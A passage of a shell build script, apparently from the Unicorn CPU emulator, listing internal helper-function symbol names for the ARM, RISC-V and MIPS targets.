helper_vfp_divd \ helper_vfp_mins \ helper_vfp_mind \ helper_vfp_maxs \ helper_vfp_maxd \ helper_vfp_minnums \ helper_vfp_minnumd \ helper_vfp_maxnums \ helper_vfp_maxnumd \ helper_vfp_negs \ helper_vfp_negd \ helper_vfp_abss \ helper_vfp_absd \ helper_vfp_sqrts \ helper_vfp_sqrtd \ helper_vfp_cmps \ helper_vfp_cmpes \ helper_vfp_cmpd \ helper_vfp_cmped \ helper_vfp_sitoh \ helper_vfp_tosih \ helper_vfp_tosizh \ helper_vfp_sitos \ helper_vfp_tosis \ helper_vfp_tosizs \ helper_vfp_sitod \ helper_vfp_tosid \ helper_vfp_tosizd \ helper_vfp_uitoh \ helper_vfp_touih \ helper_vfp_touizh \ helper_vfp_uitos \ helper_vfp_touis \ helper_vfp_touizs \ helper_vfp_uitod \ helper_vfp_touid \ helper_vfp_touizd \ helper_vfp_fcvtds \ helper_vfp_fcvtsd \ helper_vfp_shtod \ helper_vfp_toshd_round_to_zero \ helper_vfp_toshd \ helper_vfp_sltod \ helper_vfp_tosld_round_to_zero \ helper_vfp_tosld \ helper_vfp_sqtod \ helper_vfp_tosqd \ helper_vfp_uhtod \ helper_vfp_touhd_round_to_zero \ helper_vfp_touhd \ helper_vfp_ultod \ helper_vfp_tould_round_to_zero \ helper_vfp_tould \ helper_vfp_uqtod \ helper_vfp_touqd \ helper_vfp_shtos \ helper_vfp_toshs_round_to_zero \ helper_vfp_toshs \ helper_vfp_sltos \ helper_vfp_tosls_round_to_zero \ helper_vfp_tosls \ helper_vfp_sqtos \ helper_vfp_tosqs \ helper_vfp_uhtos \ helper_vfp_touhs_round_to_zero \ helper_vfp_touhs \ helper_vfp_ultos \ helper_vfp_touls_round_to_zero \ helper_vfp_touls \ helper_vfp_uqtos \ helper_vfp_touqs \ helper_vfp_sltoh \ helper_vfp_ultoh \ helper_vfp_sqtoh \ helper_vfp_uqtoh \ helper_vfp_toshh \ helper_vfp_touhh \ helper_vfp_toslh \ helper_vfp_toulh \ helper_vfp_tosqh \ helper_vfp_touqh \ helper_set_rmode \ helper_set_neon_rmode \ helper_vfp_fcvt_f16_to_f32 \ helper_vfp_fcvt_f32_to_f16 \ helper_vfp_fcvt_f16_to_f64 \ helper_vfp_fcvt_f64_to_f16 \ helper_recps_f32 \ helper_rsqrts_f32 \ helper_recpe_f16 \ helper_recpe_f32 \ helper_recpe_f64 \ helper_rsqrte_f16 \ helper_rsqrte_f32 \ helper_rsqrte_f64 \ helper_recpe_u32 \ helper_rsqrte_u32 \ helper_vfp_muladds \ helper_vfp_muladdd \ helper_rints_exact \ helper_rintd_exact \ helper_rints \ helper_rintd \ arm_rmode_to_sf \ helper_fjcvtzs \ helper_vjcvt \ helper_frint32_s \ helper_frint64_s \ helper_frint32_d \ helper_frint64_d \ helper_check_hcr_el2_trap \ mla_op \ mls_op \ sshl_op \ ushl_op \ uqsub_op \ sqsub_op \ uqadd_op \ sqadd_op \ sli_op \ cmtst_op \ sri_op \ usra_op \ ssra_op \ aarch64_translator_ops \ pred_esz_masks \ helper_uc_hooksys64 \ " riscv32_SYMBOLS=" riscv_cpu_mmu_index \ riscv_cpu_exec_interrupt \ riscv_cpu_fp_enabled \ riscv_cpu_swap_hypervisor_regs \ riscv_cpu_virt_enabled \ riscv_cpu_set_virt_enabled \ riscv_cpu_force_hs_excep_enabled \ riscv_cpu_set_force_hs_excep \ riscv_cpu_claim_interrupts \ riscv_cpu_update_mip \ riscv_cpu_set_rdtime_fn \ riscv_cpu_set_mode \ 
riscv_cpu_get_phys_page_debug \ riscv_cpu_do_transaction_failed \ riscv_cpu_do_unaligned_access \ riscv_cpu_tlb_fill \ riscv_cpu_do_interrupt \ riscv_get_csr_ops \ riscv_set_csr_ops \ riscv_csrrw \ riscv_csrrw_debug \ riscv_cpu_get_fflags \ riscv_cpu_set_fflags \ helper_set_rounding_mode \ helper_fmadd_s \ helper_fmadd_d \ helper_fmsub_s \ helper_fmsub_d \ helper_fnmsub_s \ helper_fnmsub_d \ helper_fnmadd_s \ helper_fnmadd_d \ helper_fadd_s \ helper_fsub_s \ helper_fmul_s \ helper_fdiv_s \ helper_fmin_s \ helper_fmax_s \ helper_fsqrt_s \ helper_fle_s \ helper_flt_s \ helper_feq_s \ helper_fcvt_w_s \ helper_fcvt_wu_s \ helper_fcvt_s_w \ helper_fcvt_s_wu \ helper_fclass_s \ helper_fadd_d \ helper_fsub_d \ helper_fmul_d \ helper_fdiv_d \ helper_fmin_d \ helper_fmax_d \ helper_fcvt_s_d \ helper_fcvt_d_s \ helper_fsqrt_d \ helper_fle_d \ helper_flt_d \ helper_feq_d \ helper_fcvt_w_d \ helper_fcvt_wu_d \ helper_fcvt_d_w \ helper_fcvt_d_wu \ helper_fclass_d \ riscv_raise_exception \ helper_raise_exception \ helper_uc_riscv_exit \ helper_csrrw \ helper_csrrs \ helper_csrrc \ helper_sret \ helper_mret \ helper_wfi \ helper_tlb_flush \ pmp_hart_has_privs \ pmpcfg_csr_write \ pmpcfg_csr_read \ pmpaddr_csr_write \ pmpaddr_csr_read \ gen_intermediate_code \ riscv_translate_init \ restore_state_to_opc \ cpu_riscv_init \ helper_fcvt_l_s \ helper_fcvt_lu_s \ helper_fcvt_s_l \ helper_fcvt_s_lu \ helper_fcvt_l_d \ helper_fcvt_lu_d \ helper_fcvt_d_l \ helper_fcvt_d_lu \ gen_helper_tlb_flush \ riscv_fpr_regnames \ riscv_int_regnames \ " riscv64_SYMBOLS=${riscv32_SYMBOLS} mips_SYMBOLS=" helper_mfc0_mvpcontrol \ helper_mfc0_mvpconf0 \ helper_mfc0_mvpconf1 \ helper_mfc0_random \ helper_mfc0_tcstatus \ helper_mftc0_tcstatus \ helper_mfc0_tcbind \ helper_mftc0_tcbind \ helper_mfc0_tcrestart \ helper_mftc0_tcrestart \ helper_mfc0_tchalt \ helper_mftc0_tchalt \ helper_mfc0_tccontext \ helper_mftc0_tccontext \ helper_mfc0_tcschedule \ helper_mftc0_tcschedule \ helper_mfc0_tcschefback \ helper_mftc0_tcschefback \ helper_mfc0_count \ helper_mfc0_saar \ helper_mfhc0_saar \ helper_mftc0_entryhi \ helper_mftc0_cause \ helper_mftc0_status \ helper_mfc0_lladdr \ helper_mfc0_maar \ helper_mfhc0_maar \ helper_mfc0_watchlo \ helper_mfc0_watchhi \ helper_mfhc0_watchhi \ helper_mfc0_debug \ helper_mftc0_debug \ helper_dmfc0_tcrestart \ helper_dmfc0_tchalt \ helper_dmfc0_tccontext \ helper_dmfc0_tcschedule \ helper_dmfc0_tcschefback \ helper_dmfc0_lladdr \ helper_dmfc0_maar \ helper_dmfc0_watchlo \ helper_dmfc0_watchhi \ helper_dmfc0_saar \ helper_mtc0_index \ helper_mtc0_mvpcontrol \ helper_mtc0_vpecontrol \ helper_mttc0_vpecontrol \ helper_mftc0_vpecontrol \ helper_mftc0_vpeconf0 \ helper_mtc0_vpeconf0 \ helper_mttc0_vpeconf0 \ helper_mtc0_vpeconf1 \ helper_mtc0_yqmask \ helper_mtc0_vpeopt \ helper_mtc0_entrylo0 \ helper_dmtc0_entrylo0 \ helper_mtc0_tcstatus \ helper_mttc0_tcstatus \ helper_mtc0_tcbind \ helper_mttc0_tcbind \ helper_mtc0_tcrestart \ helper_mttc0_tcrestart \ helper_mtc0_tchalt \ helper_mttc0_tchalt \ helper_mtc0_tccontext \ helper_mttc0_tccontext \ helper_mtc0_tcschedule \ helper_mttc0_tcschedule \ helper_mtc0_tcschefback \ helper_mttc0_tcschefback \ helper_mtc0_entrylo1 \ helper_dmtc0_entrylo1 \ helper_mtc0_context \ helper_mtc0_memorymapid \ update_pagemask \ helper_mtc0_pagemask \ helper_mtc0_pagegrain \ helper_mtc0_segctl0 \ helper_mtc0_segctl1 \ helper_mtc0_segctl2 \ helper_mtc0_pwfield \ helper_mtc0_pwsize \ helper_mtc0_wired \ helper_mtc0_pwctl \ helper_mtc0_srsconf0 \ helper_mtc0_srsconf1 \ 
helper_mtc0_srsconf2 \ helper_mtc0_srsconf3 \ helper_mtc0_srsconf4 \ helper_mtc0_hwrena \ helper_mtc0_count \ helper_mtc0_saari \ helper_mtc0_saar \ helper_mthc0_saar \ helper_mtc0_entryhi \ helper_mttc0_entryhi \ helper_mtc0_compare \ helper_mtc0_status \ helper_mttc0_status \ helper_mtc0_intctl \ helper_mtc0_srsctl \ helper_mtc0_cause \ helper_mttc0_cause \ helper_mftc0_epc \ helper_mftc0_ebase \ helper_mtc0_ebase \ helper_mttc0_ebase \ helper_mftc0_configx \ helper_mtc0_config0 \ helper_mtc0_config2 \ helper_mtc0_config3 \ helper_mtc0_config4 \ helper_mtc0_config5 \ helper_mtc0_lladdr \ helper_mtc0_maar \ helper_mthc0_maar \ helper_mtc0_maari \ helper_mtc0_watchlo \ helper_mtc0_watchhi \ helper_mthc0_watchhi \ helper_mtc0_xcontext \ helper_mtc0_framemask \ helper_mtc0_debug \ helper_mttc0_debug \ helper_mtc0_performance0 \ helper_mtc0_errctl \ helper_mtc0_taglo \ helper_mtc0_datalo \ helper_mtc0_taghi \ helper_mtc0_datahi \ helper_mftgpr \ helper_mftlo \ helper_mfthi \ helper_mftacx \ helper_mftdsp \ helper_mttgpr \ helper_mttlo \ helper_mtthi \ helper_mttacx \ helper_mttdsp \ helper_dmt \ helper_emt \ helper_dvpe \ helper_evpe \ helper_dvp \ helper_evp \ cpu_mips_get_random \ cpu_mips_init \ helper_absq_s_ph \ helper_absq_s_qb \ helper_absq_s_w \ helper_absq_s_ob \ helper_absq_s_qh \ helper_absq_s_pw \ helper_addqh_ph \ helper_addqh_r_ph \ helper_addqh_r_w \ helper_addqh_w \ helper_adduh_qb \ helper_adduh_r_qb \ helper_subqh_ph \ helper_subqh_r_ph \ helper_subqh_r_w \ helper_subqh_w \ helper_addq_ph \ helper_addq_s_ph \ helper_addq_s_w \ helper_addu_ph \ helper_addu_qb \ helper_addu_s_ph \ helper_addu_s_qb \ helper_subq_ph \ helper_subq_s_ph \ helper_subq_s_w \ helper_subu_ph \ helper_subu_qb \ helper_subu_s_ph \ helper_subu_s_qb \ helper_adduh_ob \ helper_adduh_r_ob \ helper_subuh_ob \ helper_subuh_r_ob \ helper_addq_pw \ helper_addq_qh \ helper_addq_s_pw \ helper_addq_s_qh \ helper_addu_ob \ helper_addu_qh \ helper_addu_s_ob \ helper_addu_s_qh \ helper_subq_pw \ helper_subq_qh \ helper_subq_s_pw \ helper_subq_s_qh \ helper_subu_ob \ helper_subu_qh \ helper_subu_s_ob \ helper_subu_s_qh \ helper_subuh_qb \ helper_subuh_r_qb \ helper_addsc \ helper_addwc \ helper_modsub \ helper_raddu_w_qb \ helper_raddu_l_ob \ helper_precr_qb_ph \ helper_precrq_qb_ph \ helper_precr_sra_ph_w \ helper_precr_sra_r_ph_w \ helper_precrq_ph_w \ helper_precrq_rs_ph_w \ helper_precr_ob_qh \ helper_precr_sra_qh_pw \ helper_precr_sra_r_qh_pw \ helper_precrq_ob_qh \ helper_precrq_qh_pw \ helper_precrq_rs_qh_pw \ helper_precrq_pw_l \ helper_precrqu_s_qb_ph \ helper_precrqu_s_ob_qh \ helper_preceq_pw_qhl \ helper_preceq_pw_qhr \ helper_preceq_pw_qhla \ helper_preceq_pw_qhra \ helper_precequ_ph_qbl \ helper_precequ_ph_qbr \ helper_precequ_ph_qbla \ helper_precequ_ph_qbra \ helper_precequ_qh_obl \ helper_precequ_qh_obr \ helper_precequ_qh_obla \ helper_precequ_qh_obra \ helper_preceu_ph_qbl \ helper_preceu_ph_qbr \ helper_preceu_ph_qbla \ helper_preceu_ph_qbra \ helper_preceu_qh_obl \ helper_preceu_qh_obr \ helper_preceu_qh_obla \ helper_preceu_qh_obra \ helper_shll_qb \ helper_shrl_qb \ helper_shra_qb \ helper_shra_r_qb \ helper_shll_ob \ helper_shrl_ob \ helper_shra_ob \ helper_shra_r_ob \ helper_shll_ph \ helper_shll_s_ph \ helper_shll_qh \ helper_shll_s_qh \ helper_shrl_qh \ helper_shra_qh \ helper_shra_r_qh \ helper_shll_s_w \ helper_shra_r_w \ helper_shll_pw \ helper_shll_s_pw \ helper_shra_pw \ helper_shra_r_pw \ helper_shrl_ph \ helper_shra_ph \ helper_shra_r_ph \ helper_muleu_s_ph_qbl \ helper_muleu_s_ph_qbr 
\ helper_mulq_rs_ph \ helper_mul_ph \ helper_mul_s_ph \ helper_mulq_s_ph \ helper_muleq_s_w_phl \ helper_muleq_s_w_phr \ helper_mulsaq_s_w_ph \ helper_mulsa_w_ph \ helper_muleu_s_qh_obl \ helper_muleu_s_qh_obr \ helper_mulq_rs_qh \ helper_muleq_s_pw_qhl \ helper_muleq_s_pw_qhr \ helper_mulsaq_s_w_qh \ helper_dpau_h_qbl \ helper_dpau_h_qbr \ helper_dpsu_h_qbl \ helper_dpsu_h_qbr \ helper_dpau_h_obl \ helper_dpau_h_obr \ helper_dpsu_h_obl \ helper_dpsu_h_obr \ helper_dpa_w_ph \ helper_dpax_w_ph \ helper_dps_w_ph \ helper_dpsx_w_ph \ helper_dpaq_s_w_ph \ helper_dpaqx_s_w_ph \ helper_dpsq_s_w_ph \ helper_dpsqx_s_w_ph \ helper_dpaqx_sa_w_ph \ helper_dpsqx_sa_w_ph \ helper_dpa_w_qh \ helper_dpaq_s_w_qh \ helper_dps_w_qh \ helper_dpsq_s_w_qh \ helper_dpaq_sa_l_w \ helper_dpsq_sa_l_w \ helper_dpaq_sa_l_pw \ helper_dpsq_sa_l_pw \ helper_mulsaq_s_l_pw \ helper_maq_s_w_phl \ helper_maq_s_w_phr \ helper_maq_sa_w_phl \ helper_maq_sa_w_phr \ helper_mulq_s_w \ helper_mulq_rs_w \ helper_maq_s_w_qhll \ helper_maq_s_w_qhlr \ helper_maq_s_w_qhrl \ helper_maq_s_w_qhrr \ helper_maq_sa_w_qhll \ helper_maq_sa_w_qhlr \ helper_maq_sa_w_qhrl \ helper_maq_sa_w_qhrr \ helper_maq_s_l_pwl \ helper_maq_s_l_pwr \ helper_dmadd \ helper_dmaddu \ helper_dmsub \ helper_dmsubu \ helper_bitrev \ helper_insv \ helper_dinsv \ helper_cmpgu_eq_qb \ helper_cmpgu_lt_qb \ helper_cmpgu_le_qb \ helper_cmpgu_eq_ob \ helper_cmpgu_lt_ob \ helper_cmpgu_le_ob \ helper_cmpu_eq_qb \ helper_cmpu_lt_qb \ helper_cmpu_le_qb \ helper_cmp_eq_ph \ helper_cmp_lt_ph \ helper_cmp_le_ph \ helper_cmpu_eq_ob \ helper_cmpu_lt_ob \ helper_cmpu_le_ob \ helper_cmp_eq_qh \ helper_cmp_lt_qh \ helper_cmp_le_qh \ helper_cmp_eq_pw \ helper_cmp_lt_pw \ helper_cmp_le_pw \ helper_cmpgdu_eq_ob \ helper_cmpgdu_lt_ob \ helper_cmpgdu_le_ob \ helper_pick_qb \ helper_pick_ph \ helper_pick_ob \ helper_pick_qh \ helper_pick_pw \ helper_packrl_ph \ helper_packrl_pw \ helper_extr_w \ helper_extr_r_w \ helper_extr_rs_w \ helper_dextr_w \ helper_dextr_r_w \ helper_dextr_rs_w \ helper_dextr_l \ helper_dextr_r_l \ helper_dextr_rs_l \ helper_extr_s_h \ helper_dextr_s_h \ helper_extp \ helper_extpdp \ helper_dextp \ helper_dextpdp \ helper_shilo \ helper_dshilo \ helper_mthlip \ helper_dmthlip \ cpu_wrdsp \ helper_wrdsp \ cpu_rddsp \ helper_rddsp \ helper_cfc1 \ helper_ctc1 \ ieee_ex_to_mips \ helper_float_sqrt_d \ helper_float_sqrt_s \ helper_float_cvtd_s \ helper_float_cvtd_w \ helper_float_cvtd_l \ helper_float_cvt_l_d \ helper_float_cvt_l_s \ helper_float_cvtps_pw \ helper_float_cvtpw_ps \ helper_float_cvts_d \ helper_float_cvts_w \ helper_float_cvts_l \ helper_float_cvts_pl \ helper_float_cvts_pu \ helper_float_cvt_w_s \ helper_float_cvt_w_d \ helper_float_round_l_d \ helper_float_round_l_s \ helper_float_round_w_d \ helper_float_round_w_s \ helper_float_trunc_l_d \ helper_float_trunc_l_s \ helper_float_trunc_w_d \ helper_float_trunc_w_s \ helper_float_ceil_l_d \ helper_float_ceil_l_s \ helper_float_ceil_w_d \ helper_float_ceil_w_s \ helper_float_floor_l_d \ helper_float_floor_l_s \ helper_float_floor_w_d \ helper_float_floor_w_s \ helper_float_cvt_2008_l_d \ helper_float_cvt_2008_l_s \ helper_float_cvt_2008_w_d \ helper_float_cvt_2008_w_s \ helper_float_round_2008_l_d \ helper_float_round_2008_l_s \ helper_float_round_2008_w_d \ helper_float_round_2008_w_s \ helper_float_trunc_2008_l_d \ helper_float_trunc_2008_l_s \ helper_float_trunc_2008_w_d \ helper_float_trunc_2008_w_s \ helper_float_ceil_2008_l_d \ helper_float_ceil_2008_l_s \ helper_float_ceil_2008_w_d \ 
helper_float_ceil_2008_w_s \ helper_float_floor_2008_l_d \ helper_float_floor_2008_l_s \ helper_float_floor_2008_w_d \ helper_float_floor_2008_w_s \ helper_float_abs_d \ helper_float_abs_s \ helper_float_abs_ps \ helper_float_chs_d \ helper_float_chs_s \ helper_float_chs_ps \ helper_float_recip_d \ helper_float_recip_s \ helper_float_rsqrt_d \ helper_float_rsqrt_s \ helper_float_recip1_d \ helper_float_recip1_s \ helper_float_recip1_ps \ helper_float_rsqrt1_d \ helper_float_rsqrt1_s \ helper_float_rsqrt1_ps \ helper_float_rint_s \ helper_float_rint_d \ float_class_s \ helper_float_class_s \ float_class_d \ helper_float_class_d \ helper_float_add_d \ helper_float_add_s \ helper_float_add_ps \ helper_float_sub_d \ helper_float_sub_s \ helper_float_sub_ps \ helper_float_mul_d \ helper_float_mul_s \ helper_float_mul_ps \ helper_float_div_d \ helper_float_div_s \ helper_float_div_ps \ helper_float_recip2_d \ helper_float_recip2_s \ helper_float_recip2_ps \ helper_float_rsqrt2_d \ helper_float_rsqrt2_s \ helper_float_rsqrt2_ps \ helper_float_addr_ps \ helper_float_mulr_ps \ helper_float_max_s \ helper_float_max_d \ helper_float_maxa_s \ helper_float_maxa_d \ helper_float_min_s \ helper_float_min_d \ helper_float_mina_s \ helper_float_mina_d \ helper_float_madd_d \ helper_float_madd_s \ helper_float_madd_ps \ helper_float_msub_d \ helper_float_msub_s \ helper_float_msub_ps \ helper_float_nmadd_d \ helper_float_nmadd_s \ helper_float_nmadd_ps \ helper_float_nmsub_d \ helper_float_nmsub_s \ helper_float_nmsub_ps \ helper_float_maddf_s \ helper_float_maddf_d \ helper_float_msubf_s \ helper_float_msubf_d \ helper_cmp_d_f \ helper_cmpabs_d_f \ helper_cmp_d_un \ helper_cmpabs_d_un \ helper_cmp_d_eq \ helper_cmpabs_d_eq \ helper_cmp_d_ueq \ helper_cmpabs_d_ueq \ helper_cmp_d_olt \ helper_cmpabs_d_olt \ helper_cmp_d_ult \ helper_cmpabs_d_ult \ helper_cmp_d_ole \ helper_cmpabs_d_ole \ helper_cmp_d_ule \ helper_cmpabs_d_ule \ helper_cmp_d_sf \ helper_cmpabs_d_sf \ helper_cmp_d_ngle \ helper_cmpabs_d_ngle \ helper_cmp_d_seq \ helper_cmpabs_d_seq \ helper_cmp_d_ngl \ helper_cmpabs_d_ngl \ helper_cmp_d_lt \ helper_cmpabs_d_lt \ helper_cmp_d_nge \ helper_cmpabs_d_nge \ helper_cmp_d_le \ helper_cmpabs_d_le \ helper_cmp_d_ngt \ helper_cmpabs_d_ngt \ helper_cmp_s_f \ helper_cmpabs_s_f \ helper_cmp_s_un \ helper_cmpabs_s_un \ helper_cmp_s_eq \ helper_cmpabs_s_eq \ helper_cmp_s_ueq \ helper_cmpabs_s_ueq \ helper_cmp_s_olt \ helper_cmpabs_s_olt \ helper_cmp_s_ult \ helper_cmpabs_s_ult \ helper_cmp_s_ole \ helper_cmpabs_s_ole \ helper_cmp_s_ule \ helper_cmpabs_s_ule \ helper_cmp_s_sf \ helper_cmpabs_s_sf \ helper_cmp_s_ngle \ helper_cmpabs_s_ngle \ helper_cmp_s_seq \ helper_cmpabs_s_seq \ helper_cmp_s_ngl \ helper_cmpabs_s_ngl \ helper_cmp_s_lt \ helper_cmpabs_s_lt \ helper_cmp_s_nge \ helper_cmpabs_s_nge \ helper_cmp_s_le \ helper_cmpabs_s_le \ helper_cmp_s_ngt \ helper_cmpabs_s_ngt \ helper_cmp_ps_f \ helper_cmpabs_ps_f \ helper_cmp_ps_un \ helper_cmpabs_ps_un \ helper_cmp_ps_eq \ helper_cmpabs_ps_eq \ helper_cmp_ps_ueq \ helper_cmpabs_ps_ueq \ helper_cmp_ps_olt \ helper_cmpabs_ps_olt \ helper_cmp_ps_ult \ helper_cmpabs_ps_ult \ helper_cmp_ps_ole \ helper_cmpabs_ps_ole \ helper_cmp_ps_ule \ helper_cmpabs_ps_ule \ helper_cmp_ps_sf \ helper_cmpabs_ps_sf \ helper_cmp_ps_ngle \ helper_cmpabs_ps_ngle \ helper_cmp_ps_seq \ helper_cmpabs_ps_seq \ helper_cmp_ps_ngl \ helper_cmpabs_ps_ngl \ helper_cmp_ps_lt \ helper_cmpabs_ps_lt \ helper_cmp_ps_nge \ helper_cmpabs_ps_nge \ helper_cmp_ps_le \ helper_cmpabs_ps_le \ 
helper_cmp_ps_ngt \ helper_cmpabs_ps_ngt \ helper_r6_cmp_d_af \ helper_r6_cmp_d_un \ helper_r6_cmp_d_eq \ helper_r6_cmp_d_ueq \ helper_r6_cmp_d_lt \ helper_r6_cmp_d_ult \ helper_r6_cmp_d_le \ helper_r6_cmp_d_ule \ helper_r6_cmp_d_saf \ helper_r6_cmp_d_sun \ helper_r6_cmp_d_seq \ helper_r6_cmp_d_sueq \ helper_r6_cmp_d_slt \ helper_r6_cmp_d_sult \ helper_r6_cmp_d_sle \ helper_r6_cmp_d_sule \ helper_r6_cmp_d_or \ helper_r6_cmp_d_une \ helper_r6_cmp_d_ne \ helper_r6_cmp_d_sor \ helper_r6_cmp_d_sune \ helper_r6_cmp_d_sne \ helper_r6_cmp_s_af \ helper_r6_cmp_s_un \ helper_r6_cmp_s_eq \ helper_r6_cmp_s_ueq \ helper_r6_cmp_s_lt \ helper_r6_cmp_s_ult \ helper_r6_cmp_s_le \ helper_r6_cmp_s_ule \ helper_r6_cmp_s_saf \ helper_r6_cmp_s_sun \ helper_r6_cmp_s_seq \ helper_r6_cmp_s_sueq \ helper_r6_cmp_s_slt \ helper_r6_cmp_s_sult \ helper_r6_cmp_s_sle \ helper_r6_cmp_s_sule \ helper_r6_cmp_s_or \ helper_r6_cmp_s_une \ helper_r6_cmp_s_ne \ helper_r6_cmp_s_sor \ helper_r6_cmp_s_sune \ helper_r6_cmp_s_sne \ no_mmu_map_address \ fixed_mmu_map_address \ r4k_map_address \ cpu_mips_tlb_flush \ sync_c0_status \ cpu_mips_store_status \ cpu_mips_store_cause \ mips_cpu_get_phys_page_debug \ mips_cpu_tlb_fill \ cpu_mips_translate_address \ exception_resume_pc \ mips_cpu_do_interrupt \ mips_cpu_exec_interrupt \ r4k_invalidate_tlb \ do_raise_exception_err \ helper_paddsb \ helper_paddusb \ helper_paddsh \ helper_paddush \ helper_paddb \ helper_paddh \ helper_paddw \ helper_psubsb \ helper_psubusb \ helper_psubsh \ helper_psubush \ helper_psubb \ helper_psubh \ helper_psubw \ helper_pshufh \ helper_packsswh \ helper_packsshb \ helper_packushb \ helper_punpcklwd \ helper_punpckhwd \ helper_punpcklhw \ helper_punpckhhw \ helper_punpcklbh \ helper_punpckhbh \ helper_pavgh \ helper_pavgb \ helper_pmaxsh \ helper_pminsh \ helper_pmaxub \ helper_pminub \ helper_pcmpeqw \ helper_pcmpgtw \ helper_pcmpeqh \ helper_pcmpgth \ helper_pcmpeqb \ helper_pcmpgtb \ helper_psllw \ helper_psrlw \ helper_psraw \ helper_psllh \ helper_psrlh \ helper_psrah \ helper_pmullh \ helper_pmulhh \ helper_pmulhuh \ helper_pmaddhw \ helper_pasubub \ helper_biadd \ helper_pmovmskb \ helper_msa_nloc_b \ helper_msa_nloc_h \ helper_msa_nloc_w \ helper_msa_nloc_d \ helper_msa_nlzc_b \ helper_msa_nlzc_h \ helper_msa_nlzc_w \ helper_msa_nlzc_d \ helper_msa_pcnt_b \ helper_msa_pcnt_h \ helper_msa_pcnt_w \ helper_msa_pcnt_d \ helper_msa_binsl_b \ helper_msa_binsl_h \ helper_msa_binsl_w \ helper_msa_binsl_d \ helper_msa_binsr_b \ helper_msa_binsr_h \ helper_msa_binsr_w \ helper_msa_binsr_d \ helper_msa_bmnz_v \ helper_msa_bmz_v \ helper_msa_bsel_v \ helper_msa_bclr_b \ helper_msa_bclr_h \ helper_msa_bclr_w \ helper_msa_bclr_d \ helper_msa_bneg_b \ helper_msa_bneg_h \ helper_msa_bneg_w \ helper_msa_bneg_d \ helper_msa_bset_b \ helper_msa_bset_h \ helper_msa_bset_w \ helper_msa_bset_d \ helper_msa_add_a_b \ helper_msa_add_a_h \ helper_msa_add_a_w \ helper_msa_add_a_d \ helper_msa_adds_a_b \ helper_msa_adds_a_h \ helper_msa_adds_a_w \ helper_msa_adds_a_d \ helper_msa_adds_s_b \ helper_msa_adds_s_h \ helper_msa_adds_s_w \ helper_msa_adds_s_d \ helper_msa_adds_u_b \ helper_msa_adds_u_h \ helper_msa_adds_u_w \ helper_msa_adds_u_d \ helper_msa_addv_b \ helper_msa_addv_h \ helper_msa_addv_w \ helper_msa_addv_d \ helper_msa_hadd_s_h \ helper_msa_hadd_s_w \ helper_msa_hadd_s_d \ helper_msa_hadd_u_h \ helper_msa_hadd_u_w \ helper_msa_hadd_u_d \ helper_msa_ave_s_b \ helper_msa_ave_s_h \ helper_msa_ave_s_w \ helper_msa_ave_s_d \ helper_msa_ave_u_b \ helper_msa_ave_u_h \ 
helper_msa_ave_u_w \ helper_msa_ave_u_d \ helper_msa_aver_s_b \ helper_msa_aver_s_h \ helper_msa_aver_s_w \ helper_msa_aver_s_d \ helper_msa_aver_u_b \ helper_msa_aver_u_h \ helper_msa_aver_u_w \ helper_msa_aver_u_d \ helper_msa_ceq_b \ helper_msa_ceq_h \ helper_msa_ceq_w \ helper_msa_ceq_d \ helper_msa_cle_s_b \ helper_msa_cle_s_h \ helper_msa_cle_s_w \ helper_msa_cle_s_d \ helper_msa_cle_u_b \ helper_msa_cle_u_h \ helper_msa_cle_u_w \ helper_msa_cle_u_d \ helper_msa_clt_s_b \ helper_msa_clt_s_h \ helper_msa_clt_s_w \ helper_msa_clt_s_d \ helper_msa_clt_u_b \ helper_msa_clt_u_h \ helper_msa_clt_u_w \ helper_msa_clt_u_d \ helper_msa_div_s_b \ helper_msa_div_s_h \ helper_msa_div_s_w \ helper_msa_div_s_d \ helper_msa_div_u_b \ helper_msa_div_u_h \ helper_msa_div_u_w \ helper_msa_div_u_d \ helper_msa_max_a_b \ helper_msa_max_a_h \ helper_msa_max_a_w \ helper_msa_max_a_d \ helper_msa_max_s_b \ helper_msa_max_s_h \ helper_msa_max_s_w \ helper_msa_max_s_d \ helper_msa_max_u_b \ helper_msa_max_u_h \ helper_msa_max_u_w \ helper_msa_max_u_d \ helper_msa_min_a_b \ helper_msa_min_a_h \ helper_msa_min_a_w \ helper_msa_min_a_d \ helper_msa_min_s_b \ helper_msa_min_s_h \ helper_msa_min_s_w \ helper_msa_min_s_d \ helper_msa_min_u_b \ helper_msa_min_u_h \ helper_msa_min_u_w \ helper_msa_min_u_d \ helper_msa_mod_s_b \ helper_msa_mod_s_h \ helper_msa_mod_s_w \ helper_msa_mod_s_d \ helper_msa_mod_u_b \ helper_msa_mod_u_h \ helper_msa_mod_u_w \ helper_msa_mod_u_d \ helper_msa_asub_s_b \ helper_msa_asub_s_h \ helper_msa_asub_s_w \ helper_msa_asub_s_d \ helper_msa_asub_u_b \ helper_msa_asub_u_h \ helper_msa_asub_u_w \ helper_msa_asub_u_d \ helper_msa_hsub_s_h \ helper_msa_hsub_s_w \ helper_msa_hsub_s_d \ helper_msa_hsub_u_h \ helper_msa_hsub_u_w \ helper_msa_hsub_u_d \ helper_msa_ilvev_b \ helper_msa_ilvev_h \ helper_msa_ilvev_w \ helper_msa_ilvev_d \ helper_msa_ilvod_b \ helper_msa_ilvod_h \ helper_msa_ilvod_w \ helper_msa_ilvod_d \ helper_msa_ilvl_b \ helper_msa_ilvl_h \ helper_msa_ilvl_w \ helper_msa_ilvl_d \ helper_msa_ilvr_b \ helper_msa_ilvr_h \ helper_msa_ilvr_w \ helper_msa_ilvr_d \ helper_msa_and_v \ helper_msa_nor_v \ helper_msa_or_v \ helper_msa_xor_v \ helper_msa_move_v \ helper_msa_pckev_b \ helper_msa_pckev_h \ helper_msa_pckev_w \ helper_msa_pckev_d \ helper_msa_pckod_b \ helper_msa_pckod_h \ helper_msa_pckod_w \ helper_msa_pckod_d \ helper_msa_sll_b \ helper_msa_sll_h \ helper_msa_sll_w \ helper_msa_sll_d \ helper_msa_sra_b \ helper_msa_sra_h \ helper_msa_sra_w \ helper_msa_sra_d \ helper_msa_srar_b \ helper_msa_srar_h \ helper_msa_srar_w \ helper_msa_srar_d \ helper_msa_srl_b \ helper_msa_srl_h \ helper_msa_srl_w \ helper_msa_srl_d \ helper_msa_srlr_b \ helper_msa_srlr_h \ helper_msa_srlr_w \ helper_msa_srlr_d \ helper_msa_andi_b \ helper_msa_ori_b \ helper_msa_nori_b \ helper_msa_xori_b \ helper_msa_bmnzi_b \ helper_msa_bmzi_b \ helper_msa_bseli_b \ helper_msa_shf_df \ helper_msa_addvi_df \ helper_msa_subvi_df \ helper_msa_ceqi_df \ helper_msa_clei_s_df \ helper_msa_clei_u_df \ helper_msa_clti_s_df \ helper_msa_clti_u_df \ 